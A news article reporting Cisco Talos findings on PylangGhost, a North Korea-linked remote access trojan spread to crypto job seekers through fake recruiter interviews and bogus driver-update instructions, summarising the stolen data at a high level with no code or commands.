Crypto Sector Under Attack: Malware Targets Job Seekers’ Wallets

• Crypto job seekers are targeted by North Korean hackers using PylangGhost malware to steal sensitive data.
• Fake job interviews on phishing sites trick victims into installing malware and granting remote access.
• PylangGhost captures cookies, credentials, and system data from over 80 browser extensions and crypto wallets.

Crypto job seekers are the latest victims of a new malware campaign that is associated with North Korean hackers. According to Cisco Talos report, the remote access trojan, called PylangGhost, is programmed to extract sensitive information, such as passwords to crypto wallets and password managers. The attacks mainly target people experienced in blockchain and cryptocurrency, especially in India.

The hacking team responsible for the attacks is affiliated with Famous Chollima, also known as Wagemole. The gang resorts to creating fake job interviews as a means of tricking victims into downloading the malware. The scam sites are created to claim the identity of real projects, including Coinbase, Robinhood, and Uniswap, and the victims end up applying to work there and going through a multiple-stage phishing scenario.

Source: Cisco Talos

The attackers contact their targets first and pretend to be recruiters. They direct them to phishing sites that are emulated as valid job portals. When they get there, the victims are persuaded to allow video and camera access in the name of job interviews. In these malicious interviews, they are deceived into executing malicious instructions disguised as video driver updates. This leads to the victim system being infected with the malware, thus enabling hackers to gain remote control.

Source: X

Crypto Malware Targets Wallets

PylangGhost is a modification of the already discovered GolangGhost RAT with similar functionalities. After being deployed, the malware captures cookies and credentials used to manage upwards of 80 extensions in popular browsers and password managers, and cryptocurrency wallets like MetaMask, 1Password, and Phantom. The malware is also used to capture screenshots, manipulate files, and retrieve system information so that the attackers have constant access to the compromised device.

Source: Cisco Talos

According to Talos researchers, artificial intelligence was unlikely to have been employed in encoding the malware, as indicated by the comments in the code. The attack falls within the trend of other attacks linked to North Korean hackers. As of April, a gang linked to the $1.4 billion Bybit hacking targeted crypto developers with malware-coded job tests.

Cyber threats to job seekers in the crypto industry are growing with the expansion of this industry. Professionals recommend being extra vigilant and careful when sending job applications, particularly in the crypto market, which is increasingly experiencing fraudulent job offers and bogus interview promises. Higher security is required to safeguard personal and professional data against online criminals.